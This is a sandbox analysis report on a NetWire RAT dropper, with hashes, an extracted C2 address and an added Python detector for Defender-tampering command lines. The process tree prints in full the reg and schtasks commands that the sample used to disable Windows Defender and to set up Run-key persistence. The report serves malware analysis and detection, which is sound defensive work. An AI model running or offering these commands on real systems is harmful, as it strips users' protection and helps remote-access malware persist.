Analysis

  • max time kernel: 120s
  • max time network: 195s
  • platform: windows7_x64
  • resource: win7v20210410
  • submitted: 19-07-2021 22:05

General

  • Target: 24C8B4647F7CDEF7524055129030454F.exe
  • Size: 23.0MB
  • MD5: 24c8b4647f7cdef7524055129030454f
  • SHA1: 8b5dd2f2d271b5503a865bd6641e7a761ee9c520
  • SHA256: b7f42f93e5c2dfcb4620859c74593f1090dcca50dbf14d7665e31832b3ff0313
  • SHA512: 1316e79aac01b0a46f7dc389970f7c3e804898c47020d987c80783b56a7b61fdc184979012e96b55cd74dedb36669a1064c9198be8a79b1ac74b68d730cb762d

Malware Config

Extracted

  • Family: netwire
  • C2: maelus.mine.nu:3650

Attributes
  • activex_autorun: false
  • activex_key: (empty)
  • copy_executable: false
  • delete_original: false
  • host_id: first spread
  • install_path: (empty)
  • keylogger_dir: %AppData%\Logs\
  • lock_executable: false
  • mutex: (empty)
  • offline_keylogger: true
  • password: 0000
  • registry_autorun: false
  • startup_name: (empty)
  • use_mutex: false

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies security service 2 TTPs 1 IoCs
  • NetWire RAT payload 3 IoCs
  • Netwire

    NetWire is a RAT whose main functionality is password stealing and keylogging; it also includes remote-control capabilities.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 18 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). The sandbox labels this as likely ransomware behaviour, but the heuristic is generic: many benign programs, installers included, enumerate drives the same way, and nothing else in this report points to file encryption.

  • NSIS installer 10 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\24C8B4647F7CDEF7524055129030454F.exe
    "C:\Users\Admin\AppData\Local\Temp\24C8B4647F7CDEF7524055129030454F.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1028
    • C:\Users\Admin\AppData\Roaming\WinDriversQt.exe
      "C:\Users\Admin\AppData\Roaming\WinDriversQt.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1712
      • C:\Windows\system32\cmd.exe
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C957.tmp\C958.tmp\C959.bat C:\Users\Admin\AppData\Roaming\WinDriversQt.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1576
        • C:\Windows\system32\reg.exe
          reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
          4⤵
          PID:772
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
          4⤵
          PID:912
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
          4⤵
          PID:832
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
          4⤵
          PID:1372
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
          4⤵
          PID:744
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
          4⤵
          PID:1252
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
          4⤵
          PID:880
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
          4⤵
          PID:1548
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
          4⤵
          PID:1132
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
          4⤵
          PID:1080
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
          4⤵
          PID:660
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
          4⤵
          PID:1652
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
          4⤵
          PID:436
        • C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
          4⤵
          PID:1792
        • C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
          4⤵
          PID:1012
        • C:\Windows\system32\schtasks.exe
          schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
          4⤵
          PID:1944
        • C:\Windows\system32\schtasks.exe
          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
          4⤵
          PID:1344
        • C:\Windows\system32\schtasks.exe
          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
          4⤵
          PID:300
        • C:\Windows\system32\schtasks.exe
          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
          4⤵
          PID:1260
        • C:\Windows\system32\schtasks.exe
          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
          4⤵
          PID:1280
        • C:\Windows\system32\reg.exe
          reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
          4⤵
          PID:912
        • C:\Windows\system32\reg.exe
          reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
          4⤵
          PID:1332
        • C:\Windows\system32\reg.exe
          reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
          4⤵
          PID:1876
        • C:\Windows\system32\reg.exe
          reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
          4⤵
          PID:568
        • C:\Windows\system32\reg.exe
          reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
          4⤵
          PID:1628
        • C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
          4⤵
          PID:1272
        • C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
          4⤵
          PID:1252
        • C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
          4⤵
          PID:340
        • C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
          4⤵
          PID:936
        • C:\Windows\system32\reg.exe
          reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
          4⤵
          • Modifies security service
          PID:876
    • C:\Users\Admin\AppData\Roaming\Hostforced12.exe
      "C:\Users\Admin\AppData\Roaming\Hostforced12.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1692
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Roaming\Hostforced12.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\gold\kingencord.exe"
        3⤵
        PID:1492
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c, "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\gold\kingencord.exe"
        3⤵
        • Loads dropped DLL
        PID:960
        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\gold\kingencord.exe
          "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\gold\kingencord.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of AdjustPrivilegeToken
          PID:1772
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "azertgf" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\gold\kingencord.exe"
            5⤵
            PID:744
            • C:\Windows\SysWOW64\reg.exe
              REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "azertgf" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\gold\kingencord.exe"
              6⤵
              • Adds Run key to start application
              PID:768
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe"
            5⤵
            PID:1088
    • C:\Users\Admin\AppData\Roaming\nb672-full.exe
      "C:\Users\Admin\AppData\Roaming\nb672-full.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Checks processor information in registry
      • Suspicious behavior: GetForegroundWindowSpam
      PID:1444
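
The batch file run by cmd.exe (PID 1576) above is a stock "disable Defender" script: policy values under HKLM\Software\Policies\Microsoft\Windows Defender, the WdBoot/WdFilter/WdNisDrv/WdNisSvc/WinDefend services set to Start=4, the Defender ETW autologgers and scheduled tasks turned off, and the SecurityHealth autorun and EPP shell extension removed. None of these is unique to malware on its own, but one parent spawning all of them in one go is. As an added example (not the report's, the sandbox's, or the sample's code), here is a Python detector that classifies process-creation command lines into those tamper categories and aggregates them per parent PID, the way one would run it over Sysmon Event ID 1 or Security 4688 records. The sample events are constructed for the example from command lines in the tree above (pid/ppid as recorded there) plus one benign reg query as a control; the category names, the ProcEvent type and the threshold of three categories are the example's own choices.

```python
import re
from collections import Counter, defaultdict
from typing import Dict, List, NamedTuple


class ProcEvent(NamedTuple):
    pid: int
    ppid: int
    cmdline: str


# One regex per tampering technique seen in the C959.bat process tree.
# Registry paths are matched with literal backslashes (\\ in the raw pattern).
TAMPER_PATTERNS = {
    # Any write to or wipe of the Defender policy hive (DisableAntiSpyware,
    # Real-Time Protection\Disable*, SpyNet\SpynetReporting=0, ...).
    "defender_policy_tamper": re.compile(
        r'\breg\s+(add|delete)\s+"HKLM\\Software\\Policies\\Microsoft\\Windows Defender',
        re.IGNORECASE),
    # Defender services and drivers set to Start=4 (SERVICE_DISABLED).
    "defender_service_disable": re.compile(
        r'\breg\s+add\s+"HKLM\\System\\CurrentControlSet\\Services\\'
        r'(WdBoot|WdFilter|WdNisDrv|WdNisSvc|WinDefend)"\s+/v\s+"Start"\s+.*?/d\s+"4"',
        re.IGNORECASE),
    # Defender ETW autologgers turned off.
    "defender_etw_disable": re.compile(
        r'\\WMI\\Autologger\\Defender(Api|Audit)Logger"\s+/v\s+"Start"\s+.*?/d\s+"0"',
        re.IGNORECASE),
    # Defender / Exploit Guard scheduled tasks disabled.
    "defender_task_disable": re.compile(
        r'\bschtasks\s+/Change\s+/TN\s+"Microsoft\\Windows\\(Windows Defender|ExploitGuard)\\[^"]+"\s+/Disable',
        re.IGNORECASE),
    # Windows Security tray app removed from autorun.
    "security_health_autorun_removed": re.compile(
        r'\breg\s+delete\s+"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\'
        r'(Explorer\\StartupApproved\\)?Run"\s+/v\s+"SecurityHealth"',
        re.IGNORECASE),
    # Defender "scan with" shell extension removed.
    "epp_context_menu_removed": re.compile(
        r'\breg\s+delete\s+"HKCR\\[^"]*\\shellex\\ContextMenuHandlers\\EPP"',
        re.IGNORECASE),
    # Classic Run-key persistence (what kingencord.exe does further down the tree).
    "run_key_persistence": re.compile(
        r'\breg\s+add\s+"HK(CU|LM)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"',
        re.IGNORECASE),
}


def classify(cmdline: str) -> List[str]:
    """Return the sorted tamper categories a single command line matches."""
    return sorted(name for name, rx in TAMPER_PATTERNS.items() if rx.search(cmdline))


def scan(events: List[ProcEvent]) -> Dict[int, Counter]:
    """Aggregate matches per parent PID: the script host (cmd.exe) that spawned
    the reg.exe/schtasks.exe children is the process worth alerting on."""
    by_parent: Dict[int, Counter] = defaultdict(Counter)
    for ev in events:
        for cat in classify(ev.cmdline):
            by_parent[ev.ppid][cat] += 1
    return dict(by_parent)


def defender_kill_chains(by_parent: Dict[int, Counter], min_categories: int = 3) -> List[int]:
    """Parents whose children cover at least min_categories distinct techniques.
    A single policy write may be an admin; the breadth is the dropper signal."""
    return sorted(p for p, cats in by_parent.items() if len(cats) >= min_categories)


# Constructed sample: eight command lines copied from the process tree above
# plus one benign query (PID 2222, parent 4000) as a control.
SAMPLE_EVENTS = [
    ProcEvent(912, 1576, r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f'),
    ProcEvent(1548, 1576, r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f'),
    ProcEvent(1792, 1576, r'reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f'),
    ProcEvent(1260, 1576, r'schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable'),
    ProcEvent(1332, 1576, r'reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f'),
    ProcEvent(1876, 1576, r'reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f'),
    ProcEvent(876, 1576, r'reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f'),
    ProcEvent(768, 744, r'REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "azertgf" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\gold\kingencord.exe"'),
    ProcEvent(2222, 4000, r'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName'),  # constructed, benign
]


if __name__ == "__main__":
    findings = scan(SAMPLE_EVENTS)
    for parent, cats in sorted(findings.items()):
        print(f"parent PID {parent}: " + ", ".join(f"{c} x{n}" for c, n in sorted(cats.items())))
    print("Defender kill-chain parents:", defender_kill_chains(findings))
```

Matching on the parent rather than on each reg.exe keeps the alert count at one per script run, and the threshold lets a lone policy change from a management tool through while still catching a batch file like C959.bat that touches six different categories.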

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence
  • T1031 Modify Existing Service (2)
  • T1060 Registry Run Keys / Startup Folder (1)

Defense Evasion
  • T1112 Modify Registry (3)
  • T1089 Disabling Security Tools (1)

Discovery
  • T1082 System Information Discovery (2)
  • T1012 Query Registry (1)


Downloads

  • C:\Users\Admin\AppData\Local\Temp\C957.tmp\C958.tmp\C959.bat
    MD5: 665f21a9b6730aa08e62473e481b8c55
    SHA1: 717d52e75ac16bf032299828dd61c86af281eb43
    SHA256: dcaba420b47b5527bd3761ae8a2b76bbbf387100613b7c2f256cfe9ec58fb579
    SHA512: b3c6fe2555613f4f7b30ba434e94421c397008a999ff5c07b5df349c550ef6b4d2a8b831208ad3bb25998bf9d2fe0dbb86414ef23ef9216211ab96373d9b6f1e

  • C:\Users\Admin\AppData\Roaming\Hostforced12.exe
    MD5: 0dd48d2486589ef25c25b5971a6736b4
    SHA1: cf14144e5da02cc66015f1cd1ac95c3f4b6c2c39
    SHA256: 05b2de276efd0e79419210cd2bb390a4c2d7dd00c9cb9ec8b7c26e400a23ee42
    SHA512: 0f5055c3f66046b8f335f4e22e1f7db70ac1f46bb6574cdb7c2919bd797090e97b062508f683534e46f99d6e747a749ca0f51984c99284f4c6fce062729b5719

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\gold\kingencord.exe
    MD5: 0dd48d2486589ef25c25b5971a6736b4
    SHA1: cf14144e5da02cc66015f1cd1ac95c3f4b6c2c39
    SHA256: 05b2de276efd0e79419210cd2bb390a4c2d7dd00c9cb9ec8b7c26e400a23ee42
    SHA512: 0f5055c3f66046b8f335f4e22e1f7db70ac1f46bb6574cdb7c2919bd797090e97b062508f683534e46f99d6e747a749ca0f51984c99284f4c6fce062729b5719

  • C:\Users\Admin\AppData\Roaming\WinDriversQt.exe
    MD5: 9684ab1ebcc8844fbbffd54b3b8e5db1
    SHA1: 1fbbca3f9e063ce98cde453e1b820e056a524771
    SHA256: c32c8c21376f44cbe18075fd2f145944efe7809f4121f24661c6cd6f713909ec
    SHA512: b4e9db48dca6cf5e150236523f8f77f5180797715502107c2dfa93da30f81cef3b8a014be1374a30c349ed9e10a831c297fcf8269fc71070c2a1b9bc7df2b1df

  • C:\Users\Admin\AppData\Roaming\nb672-full.exe
    MD5: 20bb59d1445ba13a2f73fdb880fb0a4d
    SHA1: fc6280efbdc9e200468c989a1456ffae8f524dda
    SHA256: a02b43c90598585d87a1b63d6edcb4da92df5c760465b85d74006445a4aa2eb4
    SHA512: 0a50a93e42daae26370eb8dc5fbc0084623407147d2620047d33b715bdf9052e5047799fdf89662c621492d0e4027fe90797e88911524b0cefccbf47ad509414

  • \Users\Admin\AppData\Local\Temp\nsxCBC8.tmp\LangDLL.dll
    MD5: 91d5e21907e4baff0145339311abf9d9
    SHA1: f867d8529d4f3704cd4f475b46699b66cb6c2002
    SHA256: acde373cc4916be5df3d239ab67f5980c333e979f34965ee733e7c6259586e9b
    SHA512: 339e35b89f2ac7d2fbe9dfd9a55279d20463f7c298332810c0ebaa5de95e09657f4b2837904ae16a8743c4c7abf7f3c7581099bc94312c178a21783288790401

  • \Users\Admin\AppData\Local\Temp\nsxCBC8.tmp\System.dll
    MD5: b8992e497d57001ddf100f9c397fcef5
    SHA1: e26ddf101a2ec5027975d2909306457c6f61cfbd
    SHA256: 98bcd1dd88642f4dd36a300c76ebb1ddfbbbc5bfc7e3b6d7435dc6d6e030c13b
    SHA512: 8823b1904dccfaf031068102cb1def7958a057f49ff369f0e061f1b4db2090021aa620bb8442a2a6ac9355bb74ee54371dc2599c20dc723755a46ede81533a3c

  • \Users\Admin\AppData\Local\Temp\nsxCBC8.tmp\UAC.dll
    MD5: 4814167aa1c7ec892e84907094646faa
    SHA1: a57a5ecbdfa9a8777a3c587f1acb02b783afc5ee
    SHA256: 32dd7269abf5a0e5db888e307d9df313e87cef4f1b597965a9d8e00934658822
    SHA512: fb1f35e393997ecd2301f371892b59574ee6b666095c3a435336160481f6ef7ed5635c90ce5d2cf88e5ef4a5affb46cb841b7d17e7981bd6e998531193f5d067

  • \Users\Admin\AppData\Local\Temp\nsxCBC8.tmp\UserInfo.dll
    MD5: 580c256b9b61a77bc4f513cd0646730d
    SHA1: a4dea0bc275945c29a3fbe1872437267dce0bcb9
    SHA256: 6b9c723d71482373ed181097ad0afa59dd88f3b92d43b33436ec048d78308ca3
    SHA512: 423ff8579b037917bf835d7fdea4b1302fcd7cd06198f6c0e220631a05de0829229034159ef528afd67725ab93e31f6f293367f84d1de446f32b8fcbac3a0cdd

  • \Users\Admin\AppData\Local\Temp\nsxCBC8.tmp\cpudesc.dll
    MD5: d25102051b33f61c9f7fb564a4556219
    SHA1: c683964c11d5175171bd009cb08f87592c923f85
    SHA256: e58e5d1d8da2ea526d0d754b4faad3773021166b0720723efb7b30f1f5075398
    SHA512: 8828eec31926251d7e51b5bf1050c3519c9b7fca4f978fb6ee0bf18f9642c3460687f10ff79e5892100ecadbf49725711567c348e1dfccb3644bd9ef992a92f0

  • \Users\Admin\AppData\Local\Temp\nsxCBC8.tmp\nsDialogs.dll
    MD5: 70d4c5f9acc5ddf934b73fa311ade7d8
    SHA1: 6962e84782b0e1fe798cdce1d7447211228ca85b
    SHA256: 02869b76936e3c3102bb36e34b41bc989770bf81dca09f31c561bb6be52285ee
    SHA512: 40189b463173cbbad9c5101f37b4a37d970e9cd8e6f3d343cb8e54c54bdc7fdc3cfa8d7d7e7b7b0241c68768607c523be2c2c21b7efc727257731e1c5d1673fc

  • \Users\Admin\AppData\Roaming\Hostforced12.exe
    MD5     0dd48d2486589ef25c25b5971a6736b4
    SHA1    cf14144e5da02cc66015f1cd1ac95c3f4b6c2c39
    SHA256  05b2de276efd0e79419210cd2bb390a4c2d7dd00c9cb9ec8b7c26e400a23ee42
    SHA512  0f5055c3f66046b8f335f4e22e1f7db70ac1f46bb6574cdb7c2919bd797090e97b062508f683534e46f99d6e747a749ca0f51984c99284f4c6fce062729b5719

  • \Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\gold\kingencord.exe
    MD5     0dd48d2486589ef25c25b5971a6736b4
    SHA1    cf14144e5da02cc66015f1cd1ac95c3f4b6c2c39
    SHA256  05b2de276efd0e79419210cd2bb390a4c2d7dd00c9cb9ec8b7c26e400a23ee42
    SHA512  0f5055c3f66046b8f335f4e22e1f7db70ac1f46bb6574cdb7c2919bd797090e97b062508f683534e46f99d6e747a749ca0f51984c99284f4c6fce062729b5719

  • \Users\Admin\AppData\Roaming\WinDriversQt.exe
    MD5     9684ab1ebcc8844fbbffd54b3b8e5db1
    SHA1    1fbbca3f9e063ce98cde453e1b820e056a524771
    SHA256  c32c8c21376f44cbe18075fd2f145944efe7809f4121f24661c6cd6f713909ec
    SHA512  b4e9db48dca6cf5e150236523f8f77f5180797715502107c2dfa93da30f81cef3b8a014be1374a30c349ed9e10a831c297fcf8269fc71070c2a1b9bc7df2b1df

  • \Users\Admin\AppData\Roaming\nb672-full.exe
    MD5     20bb59d1445ba13a2f73fdb880fb0a4d
    SHA1    fc6280efbdc9e200468c989a1456ffae8f524dda
    SHA256  a02b43c90598585d87a1b63d6edcb4da92df5c760465b85d74006445a4aa2eb4
    SHA512  0a50a93e42daae26370eb8dc5fbc0084623407147d2620047d33b715bdf9052e5047799fdf89662c621492d0e4027fe90797e88911524b0cefccbf47ad509414

  • memory/300-106-0x0000000000000000-mapping.dmp
  • memory/340-119-0x0000000000000000-mapping.dmp
  • memory/436-101-0x0000000000000000-mapping.dmp
  • memory/568-115-0x0000000000000000-mapping.dmp
  • memory/660-99-0x0000000000000000-mapping.dmp
  • memory/744-87-0x0000000000000000-mapping.dmp
  • memory/744-135-0x0000000000000000-mapping.dmp
  • memory/768-136-0x0000000000000000-mapping.dmp
  • memory/772-81-0x0000000000000000-mapping.dmp
  • memory/832-85-0x0000000000000000-mapping.dmp
  • memory/876-121-0x0000000000000000-mapping.dmp
  • memory/880-90-0x0000000000000000-mapping.dmp
  • memory/912-82-0x0000000000000000-mapping.dmp
  • memory/912-112-0x0000000000000000-mapping.dmp
  • memory/936-120-0x0000000000000000-mapping.dmp
  • memory/960-125-0x0000000000000000-mapping.dmp
  • memory/1012-103-0x0000000000000000-mapping.dmp
  • memory/1028-59-0x0000000075591000-0x0000000075593000-memory.dmp
    Filesize  8KB
  • memory/1080-98-0x0000000000000000-mapping.dmp
  • memory/1088-138-0x0000000000400000-0x0000000000425000-memory.dmp
    Filesize  148KB
  • memory/1088-141-0x0000000000400000-0x0000000000425000-memory.dmp
    Filesize  148KB
  • memory/1088-139-0x0000000000402570-mapping.dmp
  • memory/1132-96-0x0000000000000000-mapping.dmp
  • memory/1252-89-0x0000000000000000-mapping.dmp
  • memory/1252-118-0x0000000000000000-mapping.dmp
  • memory/1260-108-0x0000000000000000-mapping.dmp
  • memory/1272-117-0x0000000000000000-mapping.dmp
  • memory/1280-109-0x0000000000000000-mapping.dmp
  • memory/1332-113-0x0000000000000000-mapping.dmp
  • memory/1344-105-0x0000000000000000-mapping.dmp
  • memory/1372-86-0x0000000000000000-mapping.dmp
  • memory/1444-76-0x0000000000000000-mapping.dmp
  • memory/1492-124-0x0000000000000000-mapping.dmp
  • memory/1548-94-0x0000000000000000-mapping.dmp
  • memory/1576-79-0x0000000000000000-mapping.dmp
  • memory/1628-116-0x0000000000000000-mapping.dmp
  • memory/1652-100-0x0000000000000000-mapping.dmp
  • memory/1692-107-0x0000000000350000-0x0000000000367000-memory.dmp
    Filesize  92KB
  • memory/1692-111-0x00000000003D0000-0x00000000003EF000-memory.dmp
    Filesize  124KB
  • memory/1692-110-0x00000000010C0000-0x00000000010C1000-memory.dmp
    Filesize  4KB
  • memory/1692-83-0x00000000011B0000-0x00000000011B1000-memory.dmp
    Filesize  4KB
  • memory/1692-69-0x0000000000000000-mapping.dmp
  • memory/1712-63-0x0000000000000000-mapping.dmp
  • memory/1772-128-0x0000000000000000-mapping.dmp
  • memory/1772-130-0x0000000001010000-0x0000000001011000-memory.dmp
    Filesize  4KB
  • memory/1772-133-0x0000000004A50000-0x0000000004A51000-memory.dmp
    Filesize  4KB
  • memory/1772-137-0x0000000000A70000-0x0000000000A7A000-memory.dmp
    Filesize  40KB
  • memory/1792-102-0x0000000000000000-mapping.dmp
  • memory/1876-114-0x0000000000000000-mapping.dmp
  • memory/1944-104-0x0000000000000000-mapping.dmp